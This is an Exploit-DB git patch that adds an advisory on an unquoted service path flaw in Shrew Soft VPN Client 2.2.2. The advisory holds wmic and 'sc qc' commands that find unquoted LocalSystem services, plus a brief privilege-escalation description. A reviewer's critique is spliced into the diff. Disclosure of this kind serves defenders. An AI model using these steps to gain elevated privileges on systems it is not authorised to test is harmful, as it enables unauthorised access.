From 9ec37edbed6fe1918e61e972d70f465210c29ceb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 16 Nov 2019 05:01:41 +0000
Subject: [PATCH] DB: 2019-11-16

1 changes to exploits/shellcodes

Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
---
 exploits/windows/local/47660.txt | 51 ++++++++++++++++++++++++++++++++
 files_exploits.csv               |  1 +
 2 files changed, 52 insertions(+)
 create mode 100644 exploits/windows/local/47660.txt

diff --git a/exploits/windows/local/47660.txt b/exploits/windows/local/47660.txt
new file mode 100644
index 000000000..27b775be0
--- /dev/null
+++ b/exploits/windows/local/47660.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path
+# Date: 2019-11-14
+# Exploit Author: D.Goedecke
+# Vendor Homepage: www.shrew.net
+# Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe
+# Version: 2.2.2
+# Tested on: Windows 10 64bit
+
+
+C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
+ShrewSoft IKE Daemon iked C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto
+ShrewSoft IPSEC Daemon ipsecd C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto
+
+
+C:\Users\user>sc qc iked
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: iked
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ShrewSoft IKE Daemon
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\user>sc qc ipsecd
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ipsecd
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : ShrewSoft IPSEC Daemon
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+
+
+#Exploit:
+============
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other
+security applications where it could potentially be executed during
+application startup or reboot. If successful, the local user's code
+would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 52bd7bbcd..43e9df202 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
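Review bot: The title and the `# Exploit Title:` header name only `iked`, yet the `wmic` output and the second `sc qc` block show `ipsecd` registered with the same unquoted path `C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service` and the same `SERVICE_START_NAME : LocalSystem`, so the entry should either cover both services or say why only one is listed. The `# Date: 2019-11-14` header also disagrees with the `2019-11-15` date recorded for this entry in the files_exploits.csv hunk. The closing `#Exploit:` paragraph is generic boilerplate and omits what a defender needs to assess risk: with this path the intermediate locations the service control manager would try lie under `C:\` and `C:\Program Files\ShrewSoft\`, which default Windows ACLs do not allow a standard user to create files in, so the weakness is only exploitable where those directory permissions have been loosened. Stating that prerequisite, and the remediation of quoting the executable path in the service's BINARY_PATH_NAME, would make the writeup actionable.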
@@ -10773,6 +10773,7 @@ id,file,description,date,author,type,platform,port
 47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
 47656,exploits/windows/local/47656.txt,"ScanGuard Antivirus 2020 - Insecure Folder Permissions",2019-11-13,hyp3rlinx,local,windows,
 47658,exploits/windows/local/47658.txt,"oXygen XML Editor 21.1.1 - XML External Entity Injection",2019-11-14,"Pablo Santiago",local,windows,
+47660,exploits/windows/local/47660.txt,"Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path",2019-11-15,D.Goedecke,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139